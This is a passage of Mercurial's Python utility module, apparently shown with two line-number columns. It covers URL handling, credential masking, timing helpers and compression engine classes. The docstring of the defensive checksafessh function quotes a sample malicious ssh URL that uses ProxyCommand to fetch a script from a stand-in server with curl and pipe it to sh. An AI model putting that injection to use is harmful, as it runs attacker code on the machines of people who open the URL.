2786 2784 if (self.host and ':' in self.host and
2787 2785 not (self.host.startswith('[') and self.host.endswith(']'))):
2788 2786 self._hostport = self.host
2789 2787 self.host, self.port = self.host.rsplit(':', 1)
2790 2788 if not self.host:
2791 2789 self.host = None
2792 2790
2793 2791 if (self.host and self.scheme == 'file' and
2794 2792 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2795 2793 raise error.Abort(_('file:// URLs can only refer to localhost'))
2796 2794
2797 2795 self.path = path
2798 2796
2799 2797 # leave the query string escaped
2800 2798 for a in ('user', 'passwd', 'host', 'port',
2801 2799 'path', 'fragment'):
2802 2800 v = getattr(self, a)
2803 2801 if v is not None:
2804 2802 setattr(self, a, urlreq.unquote(v))
2805 2803
2806 2804 @encoding.strmethod
2807 2805 def __repr__(self):
2808 2806 attrs = []
2809 2807 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2810 2808 'query', 'fragment'):
2811 2809 v = getattr(self, a)
2812 2810 if v is not None:
2813 2811 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2814 2812 return '<url %s>' % ', '.join(attrs)
2815 2813
2816 2814 def __bytes__(self):
2817 2815 r"""Join the URL's components back into a URL string.
2818 2816
2819 2817 Examples:
2820 2818
2821 2819 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2822 2820 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2823 2821 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2824 2822 'http://user:pw@host:80/?foo=bar&baz=42'
2825 2823 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2826 2824 'http://user:pw@host:80/?foo=bar%3dbaz'
2827 2825 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2828 2826 'ssh://user:pw@[::1]:2200//home/joe#'
2829 2827 >>> bytes(url(b'http://localhost:80//'))
2830 2828 'http://localhost:80//'
2831 2829 >>> bytes(url(b'http://localhost:80/'))
2832 2830 'http://localhost:80/'
2833 2831 >>> bytes(url(b'http://localhost:80'))
2834 2832 'http://localhost:80/'
2835 2833 >>> bytes(url(b'bundle:foo'))
2836 2834 'bundle:foo'
2837 2835 >>> bytes(url(b'bundle://../foo'))
2838 2836 'bundle:../foo'
2839 2837 >>> bytes(url(b'path'))
2840 2838 'path'
2841 2839 >>> bytes(url(b'file:///tmp/foo/bar'))
2842 2840 'file:///tmp/foo/bar'
2843 2841 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2844 2842 'file:///c:/tmp/foo/bar'
2845 2843 >>> print(url(br'bundle:foo\bar'))
2846 2844 bundle:foo\bar
2847 2845 >>> print(url(br'file:///D:\data\hg'))
2848 2846 file:///D:\data\hg
2849 2847 """
2850 2848 if self._localpath:
2851 2849 s = self.path
2852 2850 if self.scheme == 'bundle':
2853 2851 s = 'bundle:' + s
2854 2852 if self.fragment:
2855 2853 s += '#' + self.fragment
2856 2854 return s
2857 2855
2858 2856 s = self.scheme + ':'
2859 2857 if self.user or self.passwd or self.host:
2860 2858 s += '//'
2861 2859 elif self.scheme and (not self.path or self.path.startswith('/')
2862 2860 or hasdriveletter(self.path)):
2863 2861 s += '//'
2864 2862 if hasdriveletter(self.path):
2865 2863 s += '/'
2866 2864 if self.user:
2867 2865 s += urlreq.quote(self.user, safe=self._safechars)
2868 2866 if self.passwd:
2869 2867 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2870 2868 if self.user or self.passwd:
2871 2869 s += '@'
2872 2870 if self.host:
2873 2871 if not (self.host.startswith('[') and self.host.endswith(']')):
2874 2872 s += urlreq.quote(self.host)
2875 2873 else:
2876 2874 s += self.host
2877 2875 if self.port:
2878 2876 s += ':' + urlreq.quote(self.port)
2879 2877 if self.host:
2880 2878 s += '/'
2881 2879 if self.path:
2882 2880 # TODO: similar to the query string, we should not unescape the
2883 2881 # path when we store it, the path might contain '%2f' = '/',
2884 2882 # which we should *not* escape.
2885 2883 s += urlreq.quote(self.path, safe=self._safepchars)
2886 2884 if self.query:
2887 2885 # we store the query in escaped form.
2888 2886 s += '?' + self.query
2889 2887 if self.fragment is not None:
2890 2888 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2891 2889 return s
2892 2890
2893 2891 __str__ = encoding.strmethod(__bytes__)
2894 2892
2895 2893 def authinfo(self):
2896 2894 user, passwd = self.user, self.passwd
2897 2895 try:
2898 2896 self.user, self.passwd = None, None
2899 2897 s = bytes(self)
2900 2898 finally:
2901 2899 self.user, self.passwd = user, passwd
2902 2900 if not self.user:
2903 2901 return (s, None)
2904 2902 # authinfo[1] is passed to urllib2 password manager, and its
2905 2903 # URIs must not contain credentials. The host is passed in the
2906 2904 # URIs list because Python < 2.4.3 uses only that to search for
2907 2905 # a password.
2908 2906 return (s, (None, (s, self.host),
2909 2907 self.user, self.passwd or ''))
2910 2908
2911 2909 def isabs(self):
2912 2910 if self.scheme and self.scheme != 'file':
2913 2911 return True # remote URL
2914 2912 if hasdriveletter(self.path):
2915 2913 return True # absolute for our purposes - can't be joined()
2916 2914 if self.path.startswith(br'\\'):
2917 2915 return True # Windows UNC path
2918 2916 if self.path.startswith('/'):
2919 2917 return True # POSIX-style
2920 2918 return False
2921 2919
2922 2920 def localpath(self):
2923 2921 if self.scheme == 'file' or self.scheme == 'bundle':
2924 2922 path = self.path or '/'
2925 2923 # For Windows, we need to promote hosts containing drive
2926 2924 # letters to paths with drive letters.
2927 2925 if hasdriveletter(self._hostport):
2928 2926 path = self._hostport + '/' + self.path
2929 2927 elif (self.host is not None and self.path
2930 2928 and not hasdriveletter(path)):
2931 2929 path = '/' + path
2932 2930 return path
2933 2931 return self._origpath
2934 2932
2935 2933 def islocal(self):
2936 2934 '''whether localpath will return something that posixfile can open'''
2937 2935 return (not self.scheme or self.scheme == 'file'
2938 2936 or self.scheme == 'bundle')
2939 2937
2940 2938 def hasscheme(path):
2941 2939 return bool(url(path).scheme)
2942 2940
2943 2941 def hasdriveletter(path):
2944 2942 return path and path[1:2] == ':' and path[0:1].isalpha()
2945 2943
2946 2944 def urllocalpath(path):
2947 2945 return url(path, parsequery=False, parsefragment=False).localpath()
2948 2946
2949 2947 def checksafessh(path):
2950 2948 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2951 2949
2952 2950 This is a sanity check for ssh urls. ssh will parse the first item as
2953 2951 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2954 2952 Let's prevent these potentially exploited urls entirely and warn the
2955 2953 user.
2956 2954
2957 2955 Raises an error.Abort when the url is unsafe.
2958 2956 """
2959 2957 path = urlreq.unquote(path)
2960 2958 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2961 2959 raise error.Abort(_('potentially unsafe url: %r') %
2962 2960 (pycompat.bytestr(path),))
2963 2961
2964 2962 def hidepassword(u):
2965 2963 '''hide user credential in a url string'''
2966 2964 u = url(u)
2967 2965 if u.passwd:
2968 2966 u.passwd = '***'
2969 2967 return bytes(u)
2970 2968
2971 2969 def removeauth(u):
2972 2970 '''remove all authentication information from a url string'''
2973 2971 u = url(u)
2974 2972 u.user = u.passwd = None
2975 2973 return bytes(u)
2976 2974
2977 2975 timecount = unitcountfn(
2978 2976 (1, 1e3, _('%.0f s')),
2979 2977 (100, 1, _('%.1f s')),
2980 2978 (10, 1, _('%.2f s')),
2981 2979 (1, 1, _('%.3f s')),
2982 2980 (100, 0.001, _('%.1f ms')),
2983 2981 (10, 0.001, _('%.2f ms')),
2984 2982 (1, 0.001, _('%.3f ms')),
2985 2983 (100, 0.000001, _('%.1f us')),
2986 2984 (10, 0.000001, _('%.2f us')),
2987 2985 (1, 0.000001, _('%.3f us')),
2988 2986 (100, 0.000000001, _('%.1f ns')),
2989 2987 (10, 0.000000001, _('%.2f ns')),
2990 2988 (1, 0.000000001, _('%.3f ns')),
2991 2989 )
2992 2990
2993 2991 @attr.s
2994 2992 class timedcmstats(object):
2995 2993 """Stats information produced by the timedcm context manager on entering."""
2996 2994
2997 2995 # the starting value of the timer as a float (meaning and resulution is
2998 2996 # platform dependent, see util.timer)
2999 2997 start = attr.ib(default=attr.Factory(lambda: timer()))
3000 2998 # the number of seconds as a floating point value; starts at 0, updated when
3001 2999 # the context is exited.
3002 3000 elapsed = attr.ib(default=0)
3003 3001 # the number of nested timedcm context managers.
3004 3002 level = attr.ib(default=1)
3005 3003
3006 3004 def __bytes__(self):
3007 3005 return timecount(self.elapsed) if self.elapsed else '<unknown>'
3008 3006
3009 3007 __str__ = encoding.strmethod(__bytes__)
3010 3008
3011 3009 @contextlib.contextmanager
3012 3010 def timedcm(whencefmt, *whenceargs):
3013 3011 """A context manager that produces timing information for a given context.
3014 3012
3015 3013 On entering a timedcmstats instance is produced.
3016 3014
3017 3015 This context manager is reentrant.
3018 3016
3019 3017 """
3020 3018 # track nested context managers
3021 3019 timedcm._nested += 1
3022 3020 timing_stats = timedcmstats(level=timedcm._nested)
3023 3021 try:
3024 3022 with tracing.log(whencefmt, *whenceargs):
3025 3023 yield timing_stats
3026 3024 finally:
3027 3025 timing_stats.elapsed = timer() - timing_stats.start
3028 3026 timedcm._nested -= 1
3029 3027
3030 3028 timedcm._nested = 0
3031 3029
3032 3030 def timed(func):
3033 3031 '''Report the execution time of a function call to stderr.
3034 3032
3035 3033 During development, use as a decorator when you need to measure
3036 3034 the cost of a function, e.g. as follows:
3037 3035
3038 3036 @util.timed
3039 3037 def foo(a, b, c):
3040 3038 pass
3041 3039 '''
3042 3040
3043 3041 def wrapper(*args, **kwargs):
3044 3042 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3045 3043 result = func(*args, **kwargs)
3046 3044 stderr = procutil.stderr
3047 3045 stderr.write('%s%s: %s\n' % (
3048 3046 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3049 3047 time_stats))
3050 3048 return result
3051 3049 return wrapper
3052 3050
3053 3051 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3054 3052 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3055 3053
3056 3054 def sizetoint(s):
3057 3055 '''Convert a space specifier to a byte count.
3058 3056
3059 3057 >>> sizetoint(b'30')
3060 3058 30
3061 3059 >>> sizetoint(b'2.2kb')
3062 3060 2252
3063 3061 >>> sizetoint(b'6M')
3064 3062 6291456
3065 3063 '''
3066 3064 t = s.strip().lower()
3067 3065 try:
3068 3066 for k, u in _sizeunits:
3069 3067 if t.endswith(k):
3070 3068 return int(float(t[:-len(k)]) * u)
3071 3069 return int(t)
3072 3070 except ValueError:
3073 3071 raise error.ParseError(_("couldn't parse size: %s") % s)
3074 3072
3075 3073 class hooks(object):
3076 3074 '''A collection of hook functions that can be used to extend a
3077 3075 function's behavior. Hooks are called in lexicographic order,
3078 3076 based on the names of their sources.'''
3079 3077
3080 3078 def __init__(self):
3081 3079 self._hooks = []
3082 3080
3083 3081 def add(self, source, hook):
3084 3082 self._hooks.append((source, hook))
3085 3083
3086 3084 def __call__(self, *args):
3087 3085 self._hooks.sort(key=lambda x: x[0])
3088 3086 results = []
3089 3087 for source, hook in self._hooks:
3090 3088 results.append(hook(*args))
3091 3089 return results
3092 3090
3093 3091 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3094 3092 '''Yields lines for a nicely formatted stacktrace.
3095 3093 Skips the 'skip' last entries, then return the last 'depth' entries.
3096 3094 Each file+linenumber is formatted according to fileline.
3097 3095 Each line is formatted according to line.
3098 3096 If line is None, it yields:
3099 3097 length of longest filepath+line number,
3100 3098 filepath+linenumber,
3101 3099 function
3102 3100
3103 3101 Not be used in production code but very convenient while developing.
3104 3102 '''
3105 3103 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3106 3104 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3107 3105 ][-depth:]
3108 3106 if entries:
3109 3107 fnmax = max(len(entry[0]) for entry in entries)
3110 3108 for fnln, func in entries:
3111 3109 if line is None:
3112 3110 yield (fnmax, fnln, func)
3113 3111 else:
3114 3112 yield line % (fnmax, fnln, func)
3115 3113
3116 3114 def debugstacktrace(msg='stacktrace', skip=0,
3117 3115 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3118 3116 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3119 3117 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3120 3118 By default it will flush stdout first.
3121 3119 It can be used everywhere and intentionally does not require an ui object.
3122 3120 Not be used in production code but very convenient while developing.
3123 3121 '''
3124 3122 if otherf:
3125 3123 otherf.flush()
3126 3124 f.write('%s at:\n' % msg.rstrip())
3127 3125 for line in getstackframes(skip + 1, depth=depth):
3128 3126 f.write(line)
3129 3127 f.flush()
3130 3128
3131 3129 class dirs(object):
3132 3130 '''a multiset of directory names from a dirstate or manifest'''
3133 3131
3134 3132 def __init__(self, map, skip=None):
3135 3133 self._dirs = {}
3136 3134 addpath = self.addpath
3137 3135 if safehasattr(map, 'iteritems') and skip is not None:
3138 3136 for f, s in map.iteritems():
3139 3137 if s[0] != skip:
3140 3138 addpath(f)
3141 3139 else:
3142 3140 for f in map:
3143 3141 addpath(f)
3144 3142
3145 3143 def addpath(self, path):
3146 3144 dirs = self._dirs
3147 3145 for base in finddirs(path):
3148 3146 if base in dirs:
3149 3147 dirs[base] += 1
3150 3148 return
3151 3149 dirs[base] = 1
3152 3150
3153 3151 def delpath(self, path):
3154 3152 dirs = self._dirs
3155 3153 for base in finddirs(path):
3156 3154 if dirs[base] > 1:
3157 3155 dirs[base] -= 1
3158 3156 return
3159 3157 del dirs[base]
3160 3158
3161 3159 def __iter__(self):
3162 3160 return iter(self._dirs)
3163 3161
3164 3162 def __contains__(self, d):
3165 3163 return d in self._dirs
3166 3164
3167 3165 if safehasattr(parsers, 'dirs'):
3168 3166 dirs = parsers.dirs
3169 3167
3170 3168 def finddirs(path):
3171 3169 pos = path.rfind('/')
3172 3170 while pos != -1:
3173 3171 yield path[:pos]
3174 3172 pos = path.rfind('/', 0, pos)
3175 3173
3176 3174 # compression code
3177 3175
3178 3176 SERVERROLE = 'server'
3179 3177 CLIENTROLE = 'client'
3180 3178
3181 3179 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3182 3180 (u'name', u'serverpriority',
3183 3181 u'clientpriority'))
3184 3182
3185 3183 class compressormanager(object):
3186 3184 """Holds registrations of various compression engines.
3187 3185
3188 3186 This class essentially abstracts the differences between compression
3189 3187 engines to allow new compression formats to be added easily, possibly from
3190 3188 extensions.
3191 3189
3192 3190 Compressors are registered against the global instance by calling its
3193 3191 ``register()`` method.
3194 3192 """
3195 3193 def __init__(self):
3196 3194 self._engines = {}
3197 3195 # Bundle spec human name to engine name.
3198 3196 self._bundlenames = {}
3199 3197 # Internal bundle identifier to engine name.
3200 3198 self._bundletypes = {}
3201 3199 # Revlog header to engine name.
3202 3200 self._revlogheaders = {}
3203 3201 # Wire proto identifier to engine name.
3204 3202 self._wiretypes = {}
3205 3203
3206 3204 def __getitem__(self, key):
3207 3205 return self._engines[key]
3208 3206
3209 3207 def __contains__(self, key):
3210 3208 return key in self._engines
3211 3209
3212 3210 def __iter__(self):
3213 3211 return iter(self._engines.keys())
3214 3212
3215 3213 def register(self, engine):
3216 3214 """Register a compression engine with the manager.
3217 3215
3218 3216 The argument must be a ``compressionengine`` instance.
3219 3217 """
3220 3218 if not isinstance(engine, compressionengine):
3221 3219 raise ValueError(_('argument must be a compressionengine'))
3222 3220
3223 3221 name = engine.name()
3224 3222
3225 3223 if name in self._engines:
3226 3224 raise error.Abort(_('compression engine %s already registered') %
3227 3225 name)
3228 3226
3229 3227 bundleinfo = engine.bundletype()
3230 3228 if bundleinfo:
3231 3229 bundlename, bundletype = bundleinfo
3232 3230
3233 3231 if bundlename in self._bundlenames:
3234 3232 raise error.Abort(_('bundle name %s already registered') %
3235 3233 bundlename)
3236 3234 if bundletype in self._bundletypes:
3237 3235 raise error.Abort(_('bundle type %s already registered by %s') %
3238 3236 (bundletype, self._bundletypes[bundletype]))
3239 3237
3240 3238 # No external facing name declared.
3241 3239 if bundlename:
3242 3240 self._bundlenames[bundlename] = name
3243 3241
3244 3242 self._bundletypes[bundletype] = name
3245 3243
3246 3244 wiresupport = engine.wireprotosupport()
3247 3245 if wiresupport:
3248 3246 wiretype = wiresupport.name
3249 3247 if wiretype in self._wiretypes:
3250 3248 raise error.Abort(_('wire protocol compression %s already '
3251 3249 'registered by %s') %
3252 3250 (wiretype, self._wiretypes[wiretype]))
3253 3251
3254 3252 self._wiretypes[wiretype] = name
3255 3253
3256 3254 revlogheader = engine.revlogheader()
3257 3255 if revlogheader and revlogheader in self._revlogheaders:
3258 3256 raise error.Abort(_('revlog header %s already registered by %s') %
3259 3257 (revlogheader, self._revlogheaders[revlogheader]))
3260 3258
3261 3259 if revlogheader:
3262 3260 self._revlogheaders[revlogheader] = name
3263 3261
3264 3262 self._engines[name] = engine
3265 3263
3266 3264 @property
3267 3265 def supportedbundlenames(self):
3268 3266 return set(self._bundlenames.keys())
3269 3267
3270 3268 @property
3271 3269 def supportedbundletypes(self):
3272 3270 return set(self._bundletypes.keys())
3273 3271
3274 3272 def forbundlename(self, bundlename):
3275 3273 """Obtain a compression engine registered to a bundle name.
3276 3274
3277 3275 Will raise KeyError if the bundle type isn't registered.
3278 3276
3279 3277 Will abort if the engine is known but not available.
3280 3278 """
3281 3279 engine = self._engines[self._bundlenames[bundlename]]
3282 3280 if not engine.available():
3283 3281 raise error.Abort(_('compression engine %s could not be loaded') %
3284 3282 engine.name())
3285 3283 return engine
3286 3284
3287 3285 def forbundletype(self, bundletype):
3288 3286 """Obtain a compression engine registered to a bundle type.
3289 3287
3290 3288 Will raise KeyError if the bundle type isn't registered.
3291 3289
3292 3290 Will abort if the engine is known but not available.
3293 3291 """
3294 3292 engine = self._engines[self._bundletypes[bundletype]]
3295 3293 if not engine.available():
3296 3294 raise error.Abort(_('compression engine %s could not be loaded') %
3297 3295 engine.name())
3298 3296 return engine
3299 3297
3300 3298 def supportedwireengines(self, role, onlyavailable=True):
3301 3299 """Obtain compression engines that support the wire protocol.
3302 3300
3303 3301 Returns a list of engines in prioritized order, most desired first.
3304 3302
3305 3303 If ``onlyavailable`` is set, filter out engines that can't be
3306 3304 loaded.
3307 3305 """
3308 3306 assert role in (SERVERROLE, CLIENTROLE)
3309 3307
3310 3308 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3311 3309
3312 3310 engines = [self._engines[e] for e in self._wiretypes.values()]
3313 3311 if onlyavailable:
3314 3312 engines = [e for e in engines if e.available()]
3315 3313
3316 3314 def getkey(e):
3317 3315 # Sort first by priority, highest first. In case of tie, sort
3318 3316 # alphabetically. This is arbitrary, but ensures output is
3319 3317 # stable.
3320 3318 w = e.wireprotosupport()
3321 3319 return -1 * getattr(w, attr), w.name
3322 3320
3323 3321 return list(sorted(engines, key=getkey))
3324 3322
3325 3323 def forwiretype(self, wiretype):
3326 3324 engine = self._engines[self._wiretypes[wiretype]]
3327 3325 if not engine.available():
3328 3326 raise error.Abort(_('compression engine %s could not be loaded') %
3329 3327 engine.name())
3330 3328 return engine
3331 3329
3332 3330 def forrevlogheader(self, header):
3333 3331 """Obtain a compression engine registered to a revlog header.
3334 3332
3335 3333 Will raise KeyError if the revlog header value isn't registered.
3336 3334 """
3337 3335 return self._engines[self._revlogheaders[header]]
3338 3336
3339 3337 compengines = compressormanager()
3340 3338
3341 3339 class compressionengine(object):
3342 3340 """Base class for compression engines.
3343 3341
3344 3342 Compression engines must implement the interface defined by this class.
3345 3343 """
3346 3344 def name(self):
3347 3345 """Returns the name of the compression engine.
3348 3346
3349 3347 This is the key the engine is registered under.
3350 3348
3351 3349 This method must be implemented.
3352 3350 """
3353 3351 raise NotImplementedError()
3354 3352
3355 3353 def available(self):
3356 3354 """Whether the compression engine is available.
3357 3355
3358 3356 The intent of this method is to allow optional compression engines
3359 3357 that may not be available in all installations (such as engines relying
3360 3358 on C extensions that may not be present).
3361 3359 """
3362 3360 return True
3363 3361
3364 3362 def bundletype(self):
3365 3363 """Describes bundle identifiers for this engine.
3366 3364
3367 3365 If this compression engine isn't supported for bundles, returns None.
3368 3366
3369 3367 If this engine can be used for bundles, returns a 2-tuple of strings of
3370 3368 the user-facing "bundle spec" compression name and an internal
3371 3369 identifier used to denote the compression format within bundles. To
3372 3370 exclude the name from external usage, set the first element to ``None``.
3373 3371
3374 3372 If bundle compression is supported, the class must also implement
3375 3373 ``compressstream`` and `decompressorreader``.
3376 3374
3377 3375 The docstring of this method is used in the help system to tell users
3378 3376 about this engine.
3379 3377 """
3380 3378 return None
3381 3379
3382 3380 def wireprotosupport(self):
3383 3381 """Declare support for this compression format on the wire protocol.
3384 3382
3385 3383 If this compression engine isn't supported for compressing wire
3386 3384 protocol payloads, returns None.
3387 3385
3388 3386 Otherwise, returns ``compenginewireprotosupport`` with the following
3389 3387 fields:
3390 3388
3391 3389 * String format identifier
3392 3390 * Integer priority for the server
3393 3391 * Integer priority for the client
3394 3392
3395 3393 The integer priorities are used to order the advertisement of format
3396 3394 support by server and client. The highest integer is advertised
3397 3395 first. Integers with non-positive values aren't advertised.
3398 3396
3399 3397 The priority values are somewhat arbitrary and only used for default
3400 3398 ordering. The relative order can be changed via config options.
3401 3399
3402 3400 If wire protocol compression is supported, the class must also implement
3403 3401 ``compressstream`` and ``decompressorreader``.
3404 3402 """
3405 3403 return None
3406 3404
3407 3405 def revlogheader(self):
3408 3406 """Header added to revlog chunks that identifies this engine.
3409 3407
3410 3408 If this engine can be used to compress revlogs, this method should
3411 3409 return the bytes used to identify chunks compressed with this engine.
3412 3410 Else, the method should return ``None`` to indicate it does not
3413 3411 participate in revlog compression.
3414 3412 """
3415 3413 return None
3416 3414
3417 3415 def compressstream(self, it, opts=None):
3418 3416 """Compress an iterator of chunks.
3419 3417
3420 3418 The method receives an iterator (ideally a generator) of chunks of
3421 3419 bytes to be compressed. It returns an iterator (ideally a generator)
3422 3420 of bytes of chunks representing the compressed output.
3423 3421
3424 3422 Optionally accepts an argument defining how to perform compression.
3425 3423 Each engine treats this argument differently.
3426 3424 """
3427 3425 raise NotImplementedError()
3428 3426
3429 3427 def decompressorreader(self, fh):
3430 3428 """Perform decompression on a file object.
3431 3429
3432 3430 Argument is an object with a ``read(size)`` method that returns
3433 3431 compressed data. Return value is an object with a ``read(size)`` that
3434 3432 returns uncompressed data.
3435 3433 """
3436 3434 raise NotImplementedError()
3437 3435
3438 3436 def revlogcompressor(self, opts=None):
3439 3437 """Obtain an object that can be used to compress revlog entries.
3440 3438
3441 3439 The object has a ``compress(data)`` method that compresses binary
3442 3440 data. This method returns compressed binary data or ``None`` if
3443 3441 the data could not be compressed (too small, not compressible, etc).
3444 3442 The returned data should have a header uniquely identifying this
3445 3443 compression format so decompression can be routed to this engine.
3446 3444 This header should be identified by the ``revlogheader()`` return
3447 3445 value.
3448 3446
3449 3447 The object has a ``decompress(data)`` method that decompresses
3450 3448 data. The method will only be called if ``data`` begins with
3451 3449 ``revlogheader()``. The method should return the raw, uncompressed
3452 3450 data or raise a ``StorageError``.
3453 3451
3454 3452 The object is reusable but is not thread safe.
3455 3453 """
3456 3454 raise NotImplementedError()
3457 3455
3458 3456 class _CompressedStreamReader(object):
3459 3457 def __init__(self, fh):
3460 3458 if safehasattr(fh, 'unbufferedread'):
3461 3459 self._reader = fh.unbufferedread
3462 3460 else:
3463 3461 self._reader = fh.read
3464 3462 self._pending = []
3465 3463 self._pos = 0
3466 3464 self._eof = False
3467 3465
3468 3466 def _decompress(self, chunk):
3469 3467 raise NotImplementedError()
3470 3468
3471 3469 def read(self, l):
3472 3470 buf = []
3473 3471 while True:
3474 3472 while self._pending:
3475 3473 if len(self._pending[0]) > l + self._pos:
3476 3474 newbuf = self._pending[0]
3477 3475 buf.append(newbuf[self._pos:self._pos + l])
3478 3476 self._pos += l
3479 3477 return ''.join(buf)
3480 3478
3481 3479 newbuf = self._pending.pop(0)
3482 3480 if self._pos:
3483 3481 buf.append(newbuf[self._pos:])
3484 3482 l -= len(newbuf) - self._pos
3485 3483 else:
3486 3484 buf.append(newbuf)
3487 3485 l -= len(newbuf)
3488 3486 self._pos = 0
3489 3487
3490 3488 if self._eof:
3491 3489 return ''.join(buf)
3492 3490 chunk = self._reader(65536)
3493 3491 self._decompress(chunk)
3494 3492 if not chunk and not self._pending and not self._eof:
3495 3493 # No progress and no new data, bail out
3496 3494 return ''.join(buf)
3497 3495
3498 3496 class _GzipCompressedStreamReader(_CompressedStreamReader):
3499 3497 def __init__(self, fh):
3500 3498 super(_GzipCompressedStreamReader, self).__init__(fh)
3501 3499 self._decompobj = zlib.decompressobj()
3502 3500 def _decompress(self, chunk):
3503 3501 newbuf = self._decompobj.decompress(chunk)
3504 3502 if newbuf:
3505 3503 self._pending.append(newbuf)
3506 3504 d = self._decompobj.copy()
3507 3505 try:
3508 3506 d.decompress('x')
3509 3507 d.flush()
3510 3508 if d.unused_data == 'x':
3511 3509 self._eof = True
3512 3510 except zlib.error:
3513 3511 pass
3514 3512
3515 3513 class _BZ2CompressedStreamReader(_CompressedStreamReader):
3516 3514 def __init__(self, fh):
3517 3515 super(_BZ2CompressedStreamReader, self).__init__(fh)
3518 3516 self._decompobj = bz2.BZ2Decompressor()
3519 3517 def _decompress(self, chunk):
3520 3518 newbuf = self._decompobj.decompress(chunk)
3521 3519 if newbuf:
3522 3520 self._pending.append(newbuf)
3523 3521 try:
3524 3522 while True:
3525 3523 newbuf = self._decompobj.decompress('')
3526 3524 if newbuf:
3527 3525 self._pending.append(newbuf)
3528 3526 else:
3529 3527 break
3530 3528 except EOFError:
3531 3529 self._eof = True
3532 3530
3533 3531 class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
3534 3532 def __init__(self, fh):
3535 3533 super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
3536 3534 newbuf = self._decompobj.decompress('BZ')
3537 3535 if newbuf:
3538 3536 self._pending.append(newbuf)
3539 3537
3540 3538 class _ZstdCompressedStreamReader(_CompressedStreamReader):
3541 3539 def __init__(self, fh, zstd):
3542 3540 super(_ZstdCompressedStreamReader, self).__init__(fh)
3543 3541 self._zstd = zstd
3544 3542 self._decompobj = zstd.ZstdDecompressor().decompressobj()
3545 3543 def _decompress(self, chunk):
3546 3544 newbuf = self._decompobj.decompress(chunk)
3547 3545 if newbuf:
3548 3546 self._pending.append(newbuf)
3549 3547 try:
3550 3548 while True:
3551 3549 newbuf = self._decompobj.decompress('')
3552 3550 if newbuf:
3553 3551 self._pending.append(newbuf)
3554 3552 else:
3555 3553 break
3556 3554 except self._zstd.ZstdError:
3557 3555 self._eof = True
3558 3556
3559 3557 class _zlibengine(compressionengine):
3560 3558 def name(self):
3561 3559 return 'zlib'
3562 3560
3563 3561 def bundletype(self):
3564 3562 """zlib compression using the DEFLATE algorithm.
3565 3563
3566 3564 All Mercurial clients should support this format. The compression
3567 3565 algorithm strikes a reasonable balance between compression ratio
3568 3566 and size.
3569 3567 """
3570 3568 return 'gzip', 'GZ'
3571 3569
3572 3570 def wireprotosupport(self):
3573 3571 return compewireprotosupport('zlib', 20, 20)
3574 3572
3575 3573 def revlogheader(self):
3576 3574 return 'x'
3577 3575
3578 3576 def compressstream(self, it, opts=None):
3579 3577 opts = opts or {}
3580 3578
3581 3579 z = zlib.compressobj(opts.get('level', -1))
3582 3580 for chunk in it:
3583 3581 data = z.compress(chunk)
3584 3582 # Not all calls to compress emit data. It is cheaper to inspect
3585 3583 # here than to feed empty chunks through generator.
3586 3584 if data:
3587 3585 yield data
3588 3586
3589 3587 yield z.flush()
3590 3588
3591 3589 def decompressorreader(self, fh):
3592 3590 return _GzipCompressedStreamReader(fh)
3593 3591
3594 3592 class zlibrevlogcompressor(object):
3595 3593 def compress(self, data):
3596 3594 insize = len(data)
3597 3595 # Caller handles empty input case.
3598 3596 assert insize > 0
3599 3597
3600 3598 if insize < 44:
3601 3599 return None
3602 3600
3603 3601 elif insize <= 1000000:
3604 3602 compressed = zlib.compress(data)
3605 3603 if len(compressed) < insize:
3606 3604 return compressed
3607 3605 return None
3608 3606
3609 3607 # zlib makes an internal copy of the input buffer, doubling
3610 3608 # memory usage for large inputs. So do streaming compression
3611 3609 # on large inputs.
3612 3610 else:
3613 3611 z = zlib.compressobj()
3614 3612 parts = []
3615 3613 pos = 0
3616 3614 while pos < insize:
3617 3615 pos2 = pos + 2**20
3618 3616 parts.append(z.compress(data[pos:pos2]))
3619 3617 pos = pos2
3620 3618 parts.append(z.flush())
3621 3619
3622 3620 if sum(map(len, parts)) < insize:
3623 3621 return ''.join(parts)
3624 3622 return None
3625 3623
3626 3624 def decompress(self, data):
3627 3625 try:
3628 3626 return zlib.decompress(data)
3629 3627 except zlib.error as e:
3630 3628 raise error.StorageError(_('revlog decompress error: %s') %
3631 3629 stringutil.forcebytestr(e))
3632 3630
3633 3631 def revlogcompressor(self, opts=None):
3634 3632 return self.zlibrevlogcompressor()
3635 3633
3636 3634 compengines.register(_zlibengine())
3637 3635
3638 3636 class _bz2engine(compressionengine):
3639 3637 def name(self):
3640 3638 return 'bz2'
3641 3639
3642 3640 def bundletype(self):
3643 3641 """An algorithm that produces smaller bundles than ``gzip``.
3644 3642
3645 3643 All Mercurial clients should support this format.
3646 3644
3647 3645 This engine will likely produce smaller bundles than ``gzip`` but
3648 3646 will be significantly slower, both during compression and
3649 3647 decompression.
3650 3648
3651 3649 If available, the ``zstd`` engine can yield similar or better
3652 3650 compression at much higher speeds.
3653 3651 """
3654 3652 return 'bzip2', 'BZ'
3655 3653
